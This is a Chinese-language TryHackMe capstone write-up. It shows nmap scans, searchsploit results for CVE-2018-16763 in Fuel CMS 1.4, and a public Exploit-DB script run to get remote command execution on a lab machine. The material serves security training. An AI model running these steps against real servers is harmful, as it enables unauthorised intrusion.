THM – Vulnerability Caspstone
What is the name of the application running on the vulnerable machine?
先扫一下常规端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
┌──(v4ler1an㉿kali)-[~]
└─$ sudo nmap -sV -T4 -Pn 10.10.217.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 01:33 EST
Nmap scan report for localhost (10.10.217.113)
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.22 seconds
|
80端口和22端口,先看80端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
┌──(v4ler1an㉿kali)-[~]
└─$ sudo nmap --script=http-headers -p80 10.10.217.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 01:35 EST
Nmap scan report for localhost (10.10.217.113)
Host is up (0.43s latency).
PORT STATE SERVICE
80/tcp open http
| http-headers:
| Date: Tue, 05 Mar 2024 06:35:42 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
|
运行的Apache服务,直接访问:
1
2
3
4
5
6
7
8
9
10
11
|
┌──(v4ler1an㉿kali)-[~]
└─$ curl http://10.10.217.113
<!DOCTYPE html>
<html lang="en-US">
<head>
... ...
<h1>Welcome to Fuel CMS</h1>
<h2>Version 1.4</h2>
... ...
|
运行的是Fuel CMS,版本为1.4。
What is the version number of this application?
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
直接searchsploit搜一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit fuel |grep 1.4
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) | php/webapps/50523.txt
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 47138
Exploit: fuel CMS 1.4.1 - Remote Code Execution (1)
URL: https://www.exploit-db.com/exploits/47138
Path: /usr/share/exploitdb/exploits/linux/webapps/47138.py
Codes: CVE-2018-16763
Verified: False
File Type: Python script, ASCII text executable
┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 49487
Exploit: Fuel CMS 1.4.1 - Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/49487
Path: /usr/share/exploitdb/exploits/php/webapps/49487.rb
Codes: CVE-2018-16763
Verified: False
File Type: Ruby script, ASCII text
┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 50477
Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
URL: https://www.exploit-db.com/exploits/50477
Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
Codes: CVE-2018-16763
Verified: False
File Type: Python script, ASCII text executable
|
看来是CVE-2018-16763。
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
直接利用上面搜到的exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
┌──(v4ler1an㉿kali)-[~]
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/50477.py --help
usage: python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u <url>
fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit
options:
-h, --help show this help message and exit
-v, --version show the version of exploit
-u url, --url url Enter the url
EXAMPLE - python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u http://10.10.21.74
┌──(v4ler1an㉿kali)-[~]
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u http://10.10.217.113/
[+]Connecting...
Enter Command $id
system
Enter Command $cd /
system
Enter Command $ls
system
|
执行成功了,但是回显有点问题,跟练习本身无关,不管了。换官方的攻击环境成功拿到flag。
V4ler1an